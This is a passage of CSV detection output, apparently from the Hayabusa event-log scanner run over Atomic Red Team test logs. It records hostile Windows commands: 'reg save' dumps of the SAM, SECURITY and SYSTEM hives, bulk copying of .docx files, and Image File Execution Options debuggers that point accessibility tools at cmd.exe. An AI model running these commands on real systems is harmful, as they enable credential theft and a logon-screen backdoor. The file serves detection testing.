powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys 